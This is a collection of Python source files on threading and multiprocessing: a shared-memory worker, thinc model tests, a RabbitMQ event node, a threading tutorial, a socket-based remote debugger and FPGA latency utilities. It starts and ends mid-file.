reduction.send_handle(self.sock, processed_tasks.mem_chunk.shm_chunk.handle, os.getppid())
def _shutdown(self):
"""Force to close all communication channels (sockets and pipes) to unlock main process
in case of error, when it may be waiting for messages that we can't deliver or the
state of protocol is mismatched"""
self.res_pipe.close()
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
class TaskReceiver:
def __init__(self, task_pipe):
self.task_pipe = task_pipe
self.tasks_cv = threading.Condition()
self.tasks_queue = []
def get_task(self):
with self.tasks_cv:
while len(self.tasks_queue) == 0:
self.tasks_cv.wait()
scheduled = self.tasks_queue.pop(0)
return scheduled
def receiver_thread(self):
"""Receives list of tasks scheduled to be done by the worker.
Intended to be run in a separate thread to avoid blocking of the main process when
it schedules another batch for the worker and worker is busy with previously scheduled
computations.
"""
try:
while True:
scheduled = self.task_pipe.recv()
if scheduled is None:
break
self._insert_task(scheduled)
finally:
self._insert_task(None)
def _insert_task(self, scheduled_task):
with self.tasks_cv:
if scheduled_task is None:
self.tasks_queue.insert(0, None)
else:
self.tasks_queue.append(scheduled_task)
self.tasks_cv.notify()
class CallbackContext:
"""Worker can run multiple Python callbacks, CallbackContext is used to
(independently from other callbacks) manage shared memory used to pass
results of the callback calls.
"""
def __init__(self, callback, mem_chunks):
self.callback = callback
self.mem_chunks = mem_chunks
def close(self):
for chunk in self.mem_chunks:
chunk.close()
def worker(worker_id, callbacks, prefetch_queue_depths, initial_chunk_size, task_pipe, res_pipe, sock, callback_pickler):
"""Entry point of worker process.
Computes the data in the main thread, in separate threads:
* waits for incoming tasks,
* serializes results and passes them to the main process.
Parameters
----------
`callbacks` : callable list
List of callables that worker can call to perform a (part of parallelized) task.
`prefetch_queue_depths` : list of int
Number of shared memory chunks that should be allocated per callaback, used in cycle buffer manner
to pass callback results to parent process.
`initial_chunk_size` : int
Initial size of shared memory chunk.
`task_pipe`: Pipe
Pipe used to read list of tasks that given callback should be run on to produce (part of a) result batch.
`res_pipe`: Pipe
Pipe used to notify the parent process about another batch ready to read in the given memory chunk.
`sock` : socket
Python wrapper around Unix socket used to pass file descriptors identifying shared memory chunk to parent process.
"""
if callback_pickler is not None:
callbacks = callback_pickler.loads(callbacks)
contexts = None
batch_dispatcher = SharedBatchesDispatcher(worker_id, sock, res_pipe)
task_receiver = TaskReceiver(task_pipe)
# run the thread as a daemon so that even when results queue blocks, worker process can exit anyway
# and can be joined in the parent process
dispatcher_thread = threading.Thread(target=batch_dispatcher.dispatcher_thread, daemon=True)
receiver_thread = threading.Thread(target=task_receiver.receiver_thread, daemon=True)
dispatcher_thread.start()
receiver_thread.start()
try:
contexts = [
CallbackContext(callback, [
SharedMemChunk("chunk_{}_{}_{}".format(worker_id, callback_idx, prefetch_idx), initial_chunk_size)
for prefetch_idx in range(prefetch_queue_depth)
])
for callback_idx, (callback, prefetch_queue_depth) in enumerate(zip(callbacks, prefetch_queue_depths))
]
while True:
scheduled = task_receiver.get_task()
if scheduled is None:
break
context = contexts[scheduled.context_i]
callback = context.callback
try:
data_batch = [(task_id, callback(*task_args))
for (task_id, task_args) in scheduled.tasks]
for i, sample in data_batch:
assert_valid_data_type(sample)
except Exception as exception:
tb_str = traceback.format_exc()
processed = _ProcessedTasks.failed(scheduled, exception, tb_str)
else:
processed = _ProcessedTasks.done(scheduled, context.mem_chunks[scheduled.dst_chunk_i], data_batch)
batch_dispatcher.dispatch(processed)
finally:
batch_dispatcher.dispatch(None)
if contexts is not None:
for context in contexts:
context.close()
|
test_model.py
|
# encoding: utf8
from __future__ import unicode_literals
import tempfile
import os
import pytest
import threading
import time
from ...neural._classes import model as base
from ...neural.ops import NumpyOps
@pytest.fixture
def model_with_no_args():
model = base.Model()
return model
def test_Model_defaults_to_name_model(model_with_no_args):
assert model_with_no_args.name == "model"
def test_changing_instance_name_doesnt_change_class_name():
model = base.Model()
assert model.name != "changed"
model.name = "changed"
model2 = base.Model()
assert model2.name != "changed"
def test_changing_class_name_doesnt_change_default_instance_name():
model = base.Model()
assert model.name != "changed"
base.Model.name = "changed"
assert model.name != "changed"
# Reset state
base.Model.name = "model"
def test_changing_class_name_doesnt_changes_nondefault_instance_name():
model = base.Model(name="nondefault")
assert model.name == "nondefault"
base.Model.name = "changed"
assert model.name == "nondefault"
def test_Model_defaults_to_cpu(model_with_no_args):
assert isinstance(model_with_no_args.ops, NumpyOps)
def test_models_get_different_ids(model_with_no_args):
model1 = base.Model()
model2 = base.Model()
assert model1.id != model2.id
def test_init_assigns_attributes():
model = base.Model()
model._mem
assert model._layers == []
assert model._operators == {}
def test_init_installs_via_descriptions():
def mock_install(attr, self):
setattr(self, attr, "model=" + self.name)
base.Model.descriptions = [("myattr", mock_install)]
model = base.Model(name="model1")
assert model.myattr == "model=%s" % "model1"
model2 = base.Model(name="model2")
assert model2.myattr == "model=%s" % "model2"
def test_init_calls_hooks():
def mock_init_hook(self, *args, **kwargs):
setattr(self, "hooked", (args, kwargs))
base.Model.on_init_hooks = [mock_init_hook]
model = base.Model(0, 1, 2)
assert model.hooked == ((0, 1, 2), {})
model2 = base.Model(value="something")
assert model2.hooked == (tuple(), {"value": "something"})
def test_use_device():
dev_id = id(base.Model.ops)
with base.Model.use_device(base.Model.ops.device):
assert id(base.Model.ops) == dev_id
with base.Model.use_device("gpu"):
assert id(base.Model.ops) != dev_id
assert id(base.Model.ops) == dev_id
def test_bind_plus():
with base.Model.define_operators({"+": lambda a, b: (a.name, b.name)}):
m = base.Model(name="a") + base.Model(name="b")
assert m == ("a", "b")
def test_plus_chain():
with base.Model.define_operators({"+": lambda a, b: a}):
m = (
base.Model(name="a")
+ base.Model(name="b")
+ base.Model(name="c")
+ base.Model(name="d")
)
assert m.name == "a"
def test_overload_operators_in_subthread():
"""Test we can create a model in a child thread with overloaded operators."""
# Worker1 will start and run, while worker 2 sleeps after Model.define_operators.
# Without thread-safety, worker2 will find that its operator definitions
# have been removed, causing an error.
worker1 = threading.Thread(target=_overload_plus, args=("+", 1))
worker2 = threading.Thread(target=_overload_plus, args=("*", 3,))
worker2.start()
worker1.start()
worker1.join()
worker2.join()
def _overload_plus(operator, sleep):
m1 = base.Model(name="a")
m2 = base.Model(name="b")
with base.Model.define_operators({operator: lambda a, b: a.name + b.name}):
time.sleep(sleep)
if operator == "+":
value = m1 + m2
else:
value = m1 * m2
assert value == "ab"
@pytest.mark.parametrize("op", "+ - * @ / // % ** << >> & ^ |".split())
def test_all_operators(op):
m1 = base.Model(name="a")
m2 = base.Model(name="b")
with base.Model.define_operators({op: lambda a, b: a.name + b.name}):
if op == "+":
value = m1 + m2
else:
with pytest.raises(TypeError):
value = m1 + m2
if op == "-":
value = m1 - m2
else:
with pytest.raises(TypeError):
value = m1 - m2
if op == "*":
value = m1 * m2
else:
with pytest.raises(TypeError):
value = m1 * m2
if op == "@":
value = m1.__matmul__(m2) # Be kind to Python 2...
else:
with pytest.raises(TypeError):
value = m1.__matmul__(m2)
if op == "/":
value = m1 / m2
else:
with pytest.raises(TypeError):
value = m1 / m2
if op == "//":
value = m1 // m2
else:
with pytest.raises(TypeError):
value = m1 // m2
if op == "^":
value = m1 ^ m2
else:
with pytest.raises(TypeError):
value = m1 ^ m2
if op == "%":
value = m1 % m2
else:
with pytest.raises(TypeError):
value = m1 % m2
if op == "**":
value = m1 ** m2
else:
with pytest.raises(TypeError):
value = m1 ** m2
if op == "<<":
value = m1 << m2
else:
with pytest.raises(TypeError):
value = m1 << m2
if op == ">>":
value = m1 >> m2
else:
with pytest.raises(TypeError):
value = m1 >> m2
if op == "&":
value = m1 & m2
else:
with pytest.raises(TypeError):
value = m1 & m2
if op == "^":
value = m1 ^ m2
else:
with pytest.raises(TypeError):
value = m1 ^ m2
if op == "|":
value = m1 | m2
else:
with pytest.raises(TypeError):
value = m1 | m2 # noqa: F841
assert base.Model._operators == {}
def test_model_can_save_to_disk(model_with_no_args):
temp_file = os.path.join(tempfile.mkdtemp(), "thinc_model")
model_with_no_args.to_disk(temp_file)
def test_model_can_load_from_disk(model_with_no_args):
temp_file = os.path.join(tempfile.mkdtemp(), "thinc_model")
model_with_no_args.to_disk(temp_file)
m2 = model_with_no_args.from_disk(temp_file)
assert model_with_no_args.to_bytes() == m2.to_bytes()
|
eventnode.py
|
#!/usr/bin/python3
# coding=utf-8
# Copyright 2021 getcarrier.io
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Event node
Allows to emit and consume global events
Emit an event: main thread
Listen for events from queue: thread one
Run callbacks: thread two
Listening and running threads are synced using local Queue
Event payloads are serialized, gziped and signed before sending to queue
"""
import threading
import pickle
import queue
import time
import gzip
import hmac
import pika # pylint: disable=E0401
from arbiter import log
from arbiter.config import Config
class EventNode: # pylint: disable=R0902
""" Event node - allows to subscribe to events and to emit new events """
def __init__(
self, host, port, user, password, vhost="carrier", event_queue="events",
hmac_key=None, hmac_digest="sha512", callback_workers=1,
ssl_context=None, ssl_server_hostname=None,
): # pylint: disable=R0913
self.queue_config = Config(host, port, user, password, vhost, event_queue, all_queue=None)
self.event_callbacks = dict() # event_name -> [callbacks]
#
self.ssl_context = ssl_context
self.ssl_server_hostname = ssl_server_hostname
#
self.hmac_key = hmac_key
self.hmac_digest = hmac_digest
if self.hmac_key is not None and isinstance(self.hmac_key, str):
self.hmac_key = self.hmac_key.encode("utf-8")
#
self.retry_interval = 3.0
#
self.stop_event = threading.Event()
self.event_lock = threading.Lock()
self.sync_queue = queue.Queue()
#
self.listening_thread = threading.Thread(target=self._listening_worker, daemon=True)
self.callback_threads = list()
for _ in range(callback_workers):
self.callback_threads.append(
threading.Thread(target=self._callback_worker, daemon=True)
)
#
self.ready_event = threading.Event()
self.started = False
def start(self):
""" Start event node """
if self.started:
return
#
self.listening_thread.start()
for callback_thread in self.callback_threads:
callback_thread.start()
#
self.ready_event.wait()
self.started = True
def stop(self):
""" Stop event node """
self.stop_event.set()
@property
def running(self):
""" Check if it is time to stop """
return not self.stop_event.is_set()
def subscribe(self, event_name, callback):
""" Subscribe to event """
with self.event_lock:
if event_name not in self.event_callbacks:
self.event_callbacks[event_name] = list()
if callback not in self.event_callbacks[event_name]:
self.event_callbacks[event_name].append(callback)
def unsubscribe(self, event_name, callback):
""" Unsubscribe from event """
with self.event_lock:
if event_name not in self.event_callbacks:
return
if callback not in self.event_callbacks[event_name]:
return
self.event_callbacks[event_name].remove(callback)
def emit(self, event_name, payload=None):
""" Emit event with payload data """
connection = self._get_connection()
channel = self._get_channel(connection)
#
event = {
"name": event_name,
"payload": payload,
}
body = gzip.compress(pickle.dumps(event, protocol=pickle.HIGHEST_PROTOCOL))
if self.hmac_key is not None:
digest = hmac.digest(self.hmac_key, body, self.hmac_digest)
body = body + digest
#
channel.basic_publish(
exchange=self.queue_config.queue,
routing_key="",
body=body,
properties=pika.BasicProperties(
delivery_mode=2
)
)
#
connection.close()
def _listening_worker(self):
while self.running:
try:
connection = self._get_connection()
channel = self._get_channel(connection)
#
exchange_queue = channel.queue_declare(queue="", exclusive=True)
channel.queue_bind(
exchange=self.queue_config.queue,
queue=exchange_queue.method.queue
)
channel.basic_consume(
queue=exchange_queue.method.queue,
on_message_callback=self._listening_callback,
auto_ack=True
)
#
self.ready_event.set()
#
channel.start_consuming()
except: # pylint: disable=W0702
log.exception(
"Exception in listening thread. Retrying in %s seconds", self.retry_interval
)
time.sleep(self.retry_interval)
finally:
try:
connection.close()
except: # pylint: disable=W0702
pass
def _listening_callback(self, channel, method, properties, body):
_ = channel, method, properties
self.sync_queue.put(body)
def _callback_worker(self):
while self.running:
try:
body = self.sync_queue.get()
#
if self.hmac_key is not None:
hmac_obj = hmac.new(self.hmac_key, digestmod=self.hmac_digest)
hmac_size = hmac_obj.digest_size
#
body_digest = body[-hmac_size:]
body = body[:-hmac_size]
#
digest = hmac.digest(self.hmac_key, body, self.hmac_digest)
#
if not hmac.compare_digest(body_digest, digest):
log.error("Invalid event digest, skipping")
continue
#
event = pickle.loads(gzip.decompress(body))
#
event_name = event.get("name")
event_payload = event.get("payload")
#
with self.event_lock:
if event_name not in self.event_callbacks:
continue
callbacks = self.event_callbacks[event_name].copy()
#
for callback in callbacks:
try:
callback(event_name, event_payload)
except: # pylint: disable=W0702
log.exception("Event callback failed, skipping")
except: # pylint: disable=W0702
log.exception("Error during event processing, skipping")
def _get_connection(self):
while self.running:
try:
#
pika_ssl_options = None
if self.ssl_context is not None:
pika_ssl_options = pika.SSLOptions(self.ssl_context, self.ssl_server_hostname)
#
connection = pika.BlockingConnection(
pika.ConnectionParameters(
host=self.queue_config.host,
port=self.queue_config.port,
virtual_host=self.queue_config.vhost,
credentials=pika.PlainCredentials(
self.queue_config.user,
self.queue_config.password
),
ssl_options=pika_ssl_options,
)
)
connection.process_data_events()
return connection
except: # pylint: disable=W0702
log.exception(
"Failed to create connection. Retrying in %s seconds", self.retry_interval
)
time.sleep(self.retry_interval)
def _get_channel(self, connection):
channel = connection.channel()
channel.exchange_declare(
exchange=self.queue_config.queue,
exchange_type="fanout",
durable=True
)
return channel
class MockEventNode: # pylint: disable=R0902
""" Event node - allows to subscribe to events and to emit new events - local-only mock """
def __init__(self): # pylint: disable=R0913
self.event_callbacks = dict() # event_name -> [callbacks]
self.started = True
def start(self):
""" Start event node """
def stop(self):
""" Stop event node """
@property
def running(self):
""" Check if it is time to stop """
return True
def subscribe(self, event_name, callback):
""" Subscribe to event """
if event_name not in self.event_callbacks:
self.event_callbacks[event_name] = list()
if callback not in self.event_callbacks[event_name]:
self.event_callbacks[event_name].append(callback)
def unsubscribe(self, event_name, callback):
""" Unsubscribe from event """
if event_name not in self.event_callbacks:
return
if callback not in self.event_callbacks[event_name]:
return
self.event_callbacks[event_name].remove(callback)
def emit(self, event_name, payload=None):
""" Emit event with payload data """
if event_name not in self.event_callbacks:
return
for callback in self.event_callbacks[event_name]:
try:
callback(event_name, payload)
except: # pylint: disable=W0702
log.exception("Event callback failed, skipping")
|
1_basic.py
|
"""
Terminologies:
- CPU - Piece of hardware that executes code
- OS - Handles the scheduling of when the CPU can be used
- PROCESS - A program that is been executed
- THREAD - A part of the program that is using the CPU, some programs are very
very simple and they only do one thing so they really need only one
thread. Whereas other more complex programs require more
functionalities and efficiency so they might use many threads.
"""
import time
import threading
# Issues with single threaded programs.
def single(name):
print(f"single started with arg {name}")
# assume this to be some sort of a complex calculation which takes time to
# process
time.sleep(2)
print('single ended')
"""
__name__ holds the context when this module is getting initialized or
executed, there are basically 2 ways a file gets executed:
1. we are runnning this file in the terminal, in this case the __name__ holds
value of '__main__'.
2. some other file is importing this, in this case the __name__ holds the
file name.
this simple distinction helps us write code in such a way that we can execute
functionalities provided by the module and see the output as well as being able
to export those functionalities without executing them at the same time.
"""
if __name__ == '__main__':
print('main started')
single('realpython')
print('main ended')
"""
When we call the function, the program gets stuck for a while until the function
does return something back, meanwhile we are not able to interact with the
program.
"""
def func(name):
print(f'func started with arg {name}')
time.sleep(2)
print('func ended')
if __name__ == '__main__':
print()
print('main started')
# we are creating a new Thread using the Thread class from threading module,
# we are also associating that thread with a target function that needs to
# be executed in a multithreaded environment.
t = threading.Thread(target=func, args=['realpython'])
# to start the thread we call the method start() on the created object
t.start()
print('\nmain ended')
"""This way we can create a non-blocking code"""
|
sdb.py
|
from __future__ import print_function
import cmd
import contextlib
import errno
import logging
import os
import pprint
import re
import rlcompleter
import select
import signal
import socket
import sys
import termios
import threading
import tty
from multiprocessing import process
from pdb import Pdb
import six
from six.moves.queue import Queue, Empty
from pygments import highlight
from pygments.lexers import PythonLexer
from pygments.formatters import Terminal256Formatter
__all__ = (
'SDB_HOST', 'SDB_PORT', 'SDB_NOTIFY_HOST', 'SDB_COLORIZE',
'DEFAULT_PORT', 'Sdb', 'debugger', 'set_trace',
)
DEFAULT_PORT = 6899
SDB_HOST = os.environ.get('SDB_HOST') or '127.0.0.1'
SDB_PORT = int(os.environ.get('SDB_PORT') or DEFAULT_PORT)
SDB_NOTIFY_HOST = os.environ.get('SDB_NOTIFY_HOST') or '127.0.0.1'
SDB_CONTEXT_LINES = os.environ.get('SDB_CONTEXT_LINES') or 60
SDB_COLORIZE = bool(int(os.environ.get('SDB_COLORIZE') or 1))
#: Holds the currently active debugger.
_current = [None]
_frame = getattr(sys, '_getframe')
NO_AVAILABLE_PORT = """\
Couldn't find an available port.
Please specify one using the SDB_PORT environment variable.
"""
BANNER = """\
{self.ident}: Ready to connect: telnet {self.host} {self.port}
Type `exit` in session to continue.
{self.ident}: Waiting for client...
"""
SESSION_STARTED = '{self.ident}: Now in session with {self.remote_addr}.'
SESSION_ENDED = '{self.ident}: Session with {self.remote_addr} ended.'
class SocketCompleter(rlcompleter.Completer):
def global_matches(self, text):
"""Compute matches when text is a simple name.
Return a list of all keywords, built-in functions and names currently
defined in self.namespace that match.
"""
matches = []
n = len(text)
for word in self.namespace:
if word[:n] == text and word != "__builtins__":
matches.append(word)
return matches
class Sdb(Pdb):
"""Socket-based debugger."""
me = 'Socket Debugger'
_prev_outs = None
_sock = None
_completer = SocketCompleter()
def __init__(self, host=SDB_HOST, port=SDB_PORT,
notify_host=SDB_NOTIFY_HOST, context_lines=SDB_CONTEXT_LINES,
port_search_limit=100, port_skew=+0, out=sys.stdout,
colorize=SDB_COLORIZE):
self.active = True
self.out = out
self.colorize = colorize
self._prev_handles = sys.stdin, sys.stdout
self.notify_host = notify_host
self.context_lines = int(context_lines)
self._sock, this_port = self.get_avail_port(
host, port, port_search_limit, port_skew,
)
self._sock.setblocking(1)
self._sock.listen(1)
self.host = host
self.port = this_port
self.ident = '{0}:{1}'.format(self.me, this_port)
self.say(BANNER.format(self=self))
self._client, address = self._sock.accept()
self._client.setblocking(1)
self.remote_addr = ':'.join(str(v) for v in address)
self.say(SESSION_STARTED.format(self=self))
self._handle = sys.stdin = sys.stdout = self._client.makefile('rw')
Pdb.__init__(self, stdin=self._handle, stdout=self._handle)
self.prompt = ''
def complete(self, text):
ns = {}
ns.update(self.curframe.f_globals.copy())
ns.update(self.curframe.f_locals.copy())
ns.update(__builtins__)
self._completer.namespace = ns
self._completer.use_main_ns = 0
self._completer.complete(text, 0)
return self._completer.matches
def get_avail_port(self, host, port, search_limit=100, skew=+0):
try:
_, skew = process._current_process.name.split('-')
skew = int(skew)
except ValueError:
pass
this_port = None
for i in range(search_limit):
_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
this_port = port + skew + i
try:
_sock.bind((host, this_port))
except socket.error as exc:
if exc.errno in [errno.EADDRINUSE, errno.EINVAL]:
continue
raise
else:
if self.notify_host:
socket.socket(socket.AF_INET, socket.SOCK_DGRAM).sendto(
str(this_port).encode('utf-8'),
(self.notify_host, 6899)
)
return _sock, this_port
else:
raise Exception(NO_AVAILABLE_PORT.format(self=self))
def __enter__(self):
return self
def __exit__(self, *exc_info):
self._close_session()
def _close_session(self):
self.stdin, self.stdout = sys.stdin, sys.stdout = self._prev_handles
if self.active:
if self._handle is not None:
self._handle.close()
if self._client is not None:
self._client.close()
if self._sock is not None:
self._sock.close()
self.active = False
self.say(SESSION_ENDED.format(self=self))
def do_continue(self, arg):
self._close_session()
self.set_continue()
return 1
do_c = do_cont = do_continue
def do_quit(self, arg):
self._close_session()
self.set_quit()
return 1
do_q = do_exit = do_quit
def set_quit(self):
# this raises a BdbQuit exception that we're unable to catch.
sys.settrace(None)
def cmdloop(self):
self.do_list(tuple())
return cmd.Cmd.cmdloop(self)
def do_list(self, args):
lines = self.context_lines
context = (lines - 2) / 2
if not args:
first = max(1, self.curframe.f_lineno - context)
last = first + context * 2
args = six.text_type('%s, %s') % (
six.text_type(int(first)),
six.text_type(int(last)),
)
self.lineno = None
with style(self, (
self.curframe.f_code.co_filename, self.curframe.f_lineno - context)
):
Pdb.do_list(self, args)
do_l = do_list
def format_stack_entry(self, *args, **kwargs):
entry = Pdb.format_stack_entry(self, *args, **kwargs)
return '\n'.join(
filter(lambda x: not x.startswith('->'), entry.splitlines())
)
def print_stack_entry(self, *args, **kwargs):
with style(self):
return Pdb.print_stack_entry(self, *args, **kwargs)
def default(self, line):
with style(self):
return Pdb.default(self, line)
def parseline(self, line):
line = line.strip()
match = re.search('^([0-9]+)([a-zA-Z]+.*)', line)
if match:
times, command = match.group(1), match.group(2)
line = command
self.cmdqueue.extend([
command for _ in range(int(times) - 1)
])
if line.startswith('lines '):
try:
self.context_lines = int(line.split(' ')[1])
line = 'l'
except ValueError:
pass
if line == '?':
line = 'dir()'
elif line.endswith('??'):
line = "import inspect; print(''.join(inspect.getsourcelines(%s)[0][:25]))" % line[:-2] # noqa
elif line.endswith('?'):
line = 'dir(%s)' % line[:-1]
return cmd.Cmd.parseline(self, line)
def emptyline(self):
pass
def onecmd(self, line):
line = line.strip()
if line.endswith('<!TAB!>'):
line = line.split('<!TAB!>')[0]
matches = self.complete(line)
if len(matches):
self.stdout.write(' '.join(matches))
self.stdout.flush()
return False
return Pdb.onecmd(self, line)
def displayhook(self, obj):
if obj is not None and not isinstance(obj, list):
return pprint.pprint(obj)
return Pdb.displayhook(self, obj)
def say(self, m):
logging.warning(m)
def debugger():
"""Return the current debugger instance, or create if none."""
sdb = _current[0]
if sdb is None or not sdb.active:
sdb = _current[0] = Sdb()
return sdb
def set_trace(frame=None):
"""Set break-point at current location, or a specified frame."""
if frame is None:
frame = _frame().f_back
return debugger().set_trace(frame)
def sigtrap(*args, **kw):
signal.signal(
signal.SIGTRAP,
lambda signum, frame: Sdb(*args, **kw).set_trace(frame.f_back)
)
@contextlib.contextmanager
def style(im_self, filepart=None, lexer=None):
lexer = PythonLexer
old_stdout = im_self.stdout
class NoneBuffer(six.StringIO):
def write(self, x):
if x == '':
x = "''"
six.StringIO.write(self, x)
buff = NoneBuffer()
im_self.stdout = buff
yield
value = buff.getvalue()
context = len(value.splitlines())
file_cache = {}
if filepart:
filepath, lineno = filepart
if filepath not in file_cache:
with open(filepath, 'r') as source:
file_cache[filepath] = source.readlines()
value = ''.join(file_cache[filepath][:int(lineno) - 1]) + value
if not value.strip():
value = 'None\n'
if im_self.colorize is True:
formatter = Terminal256Formatter(style='friendly')
value = highlight(value, lexer(), formatter)
# Properly format line numbers when they show up in multi-line strings
strcolor, _ = formatter.style_string['Token.Literal.String']
intcolor, _ = formatter.style_string['Token.Literal.Number.Integer']
value = re.sub(
r'%s([0-9]+)' % re.escape(strcolor),
lambda match: intcolor + match.group(1) + strcolor,
value,
)
# Highlight the "current" line in yellow for visibility
lineno = im_self.curframe.f_lineno
value = re.sub(
'(?<!\()%s%s[^\>]+>[^\[]+\[39m([^\x1b]+)[^m]+m([^\n]+)' % (re.escape(intcolor), lineno), # noqa
lambda match: ''.join([
str(lineno),
' ->',
'\x1b[93m',
match.group(1),
re.sub('\x1b[^m]+m', '', match.group(2)),
'\x1b[0m'
]),
value
)
if filepart:
_, first = filepart
value = '\n'.join(value.splitlines()[-context:]) + '\n'
if value.strip():
old_stdout.write(value)
im_self.stdout = old_stdout
def listen():
queue = Queue()
def _consume(queue):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('0.0.0.0', 6899))
print('listening for sdb notifications on :6899...')
while True:
r, w, x = select.select([sock], [], [])
for i in r:
data = i.recv(1024)
queue.put(data)
worker = threading.Thread(target=_consume, args=(queue,))
worker.setDaemon(True)
worker.start()
orig_tty = termios.tcgetattr(sys.stdin)
try:
tty.setcbreak(sys.stdin.fileno())
while True:
try:
port = queue.get(timeout=1)
queue.task_done()
if port == 'q':
break
port = int(port)
print('opening telnet session at port :%d...' % port)
telnet(port).connect()
print('listening for sdb notifications on :6899...')
except Empty:
pass
except KeyboardInterrupt:
print('got Ctrl-C')
queue.put('q')
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, orig_tty)
class telnet(object):
line_buff = ''
completing = None
history_pos = 0
def __init__(self, port, stdin=sys.stdin, stdout=sys.stdout):
self.port = port
self.stdin = stdin
self.stdout = stdout
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(2)
self.history = []
def connect(self):
try:
self.sock.connect(('0.0.0.0', self.port))
except Exception:
print('unable to connect')
return
print('connected to %s:%d' % ('0.0.0.0', self.port))
while True:
socket_list = [self.stdin, self.sock]
try:
r, w, e = select.select(socket_list, [], [])
for sock in r:
if sock == self.sock:
data = self.sock.recv(4096)
if not data:
print('connection closed')
return
self.recv(data)
else:
self.send()
except select.error as e:
if e[0] != errno.EINTR:
raise
def recv(self, data):
if self.completing is not None:
self.stdout.write('\x1b[2K\r')
matches = data.decode('utf-8').split(' ')
first = matches[0]
if len(matches) > 1:
if self.completing:
self.line_buff = self.line_buff.replace(
self.completing, first
)
matches[0] = (
'\033[93m' + first + '\033[0m'
)
self.stdout.write(
'\n'.join(matches) + '\n' + self.line_buff
)
else:
if self.completing:
self.line_buff = self.line_buff.replace(
self.completing, first
)
self.stdout.write(self.line_buff)
else:
self.stdout.write('\n')
self.stdout.write(data.decode('utf-8'))
self.stdout.flush()
def send(self):
char = self.stdin.read(1)
if char == '\x1b':
char += self.stdin.read(2)
if char in ('\x1b[A', '\x1b[B'):
if char == '\x1b[A':
self.history_pos -= 1
if char == '\x1b[B':
self.history_pos += 1
if self.history_pos < 0:
self.history_pos = -1
self.line_buff = ''
else:
try:
self.line_buff = self.history[self.history_pos]
except IndexError:
self.history_pos = len(self.history)
self.line_buff = ''
self.stdout.write('\x1b[2K\r%s' % self.line_buff)
elif char == '\n':
self.completing = None
self.history_pos += 1
self.history.append(self.line_buff)
self._send(
self.line_buff.encode('utf-8') + '\n'.encode('utf-8')
)
self.line_buff = ''
elif char == '\t':
self.completing = self.line_buff.rsplit(' ', 1)[-1]
self._send(
self.completing.encode('utf-8') + '<!TAB!>\n'.encode('utf-8') # noqa
)
elif char in ('\x08', '\x7f'):
self.line_buff = self.line_buff[:-1]
self.stdout.write('\x1b[2K\r%s' % self.line_buff)
else:
self.line_buff += char
self.stdout.write(char)
self.stdout.flush()
def _send(self, line):
self.sock.send(line) # pragma: nocover
if __name__ == '__main__':
listen() # pragma: nocover
|
predictor_utilities.py
|
import os
import numpy as np
import math
import re
import time
from multiprocessing import Queue
import multiprocessing
######################################
##common utitiltes
######################################
def closestMultiple(n, x):
if x > n:
return x;
z = (int)(x / 2);
n = n + z;
n = n - (n % x);
return n;
def multi_p(func,args,output_q,num_worker_threads,dump_yard):
#routine to distribute workers to multi cores
#BETTER leave it
#length of args has to be the multiple of num_worker_threads
args=list(args)
run_ites=int((len(args))//num_worker_threads)
for run_ite in range(run_ites):
processes = [multiprocessing.Process(target=func, args=([args[i]])) for i in range(run_ite*num_worker_threads,(run_ite+1)*num_worker_threads)]
#print(len(processes))
#print('queue size: ',score_pair.qsize())
for p in processes:
p.start()
time.sleep(0.01)
print('all job started')
while not output_q.empty():
pair=output_q.get()
dump_yard.append(pair)
for p in processes:
p.join()
print('all job finishes')
while not output_q.empty():
pair=output_q.get()
dump_yard.append(pair)
return None
######################################
##FPGA performance predictor specific
######################################
def model_profiler(net_struct,layer_block_corr=None):
param_size=0
param_size_bits=0
mac_size=1
block_wise_performance={}
if layer_block_corr!= None:
for key in layer_block_corr.keys():
block_wise_performance[key]=0
for i, layer_struct in enumerate(net_struct):
mac_size+=(layer_struct[0]*layer_struct[1]*(layer_struct[2]**2)*(layer_struct[3]**2))
param_size+=(layer_struct[0]*layer_struct[1]*(layer_struct[3]**2))
if layer_block_corr!= None:
for key in layer_block_corr.keys():
if i in layer_block_corr[key]:
block_wise_performance[key]+=(layer_struct[0]*layer_struct[1]*(layer_struct[2]**2)*(layer_struct[3]**2))
#break
#print(mac_size)
return param_size,mac_size,block_wise_performance
def pack_data(fn,keyword):
files=os.listdir(fn)
packed_data=[]
for f in files:
if(keyword in f):
raw=np.load(fn+f,allow_pickle=True)
for dp in raw:
packed_data.append([dp[0][0][:]+[dp[0][1]],dp[1][0]])
return packed_data
def comp_engine_lat(comp_mode,input_params,net_struct):
result_lat=1
if comp_mode==0:
result_lat*=(input_params[2]*input_params[3]*input_params[0]*input_params[1]*net_struct[3]\
*net_struct[3]/input_params[6])
elif comp_mode==1:
result_lat*=(input_params[2]*input_params[3]*input_params[0]*input_params[1]*net_struct[3]\
*net_struct[3]/input_params[6]/input_params[7])
elif comp_mode==2:
result_lat*=(input_params[2]*input_params[3]*input_params[0]*input_params[1]*net_struct[3]\
*net_struct[3]/input_params[4])
#print('comp lat ', result_lat)
return result_lat
def dw_comp_engine_lat(comp_mode,input_params,net_struct):
if input_params[3] !=1:
print(input_params)
raise Exception('input channel & corresponding tiling needs to be set as one for dw conv')
result_lat=1
if comp_mode==0:
result_lat*=(input_params[2]*input_params[0]*input_params[1]*net_struct[3]\
*net_struct[3]/input_params[6])
elif comp_mode==1:
result_lat*=(input_params[2]*input_params[0]*input_params[1]*net_struct[3]\
*net_struct[3]/input_params[4])
else:
raise Exception('non-supported comp mode')
return result_lat
def read_if_lat(comp_mode,input_params,net_struct,quant=16):
tri=max(input_params[4]+net_struct[3]-1,input_params[0])
tci=max(input_params[5]+net_struct[3]-1,input_params[1])
if comp_mode==2:
return math.ceil(input_params[3]*tci*tri/max(min(4,tri),2))*(quant/16)
else:
return math.ceil(input_params[3]*tci*tri/max(min(4,input_params[7]),2))*(quant/16)
def dw_read_if_lat(comp_mode,input_params,net_struct,quant=16):
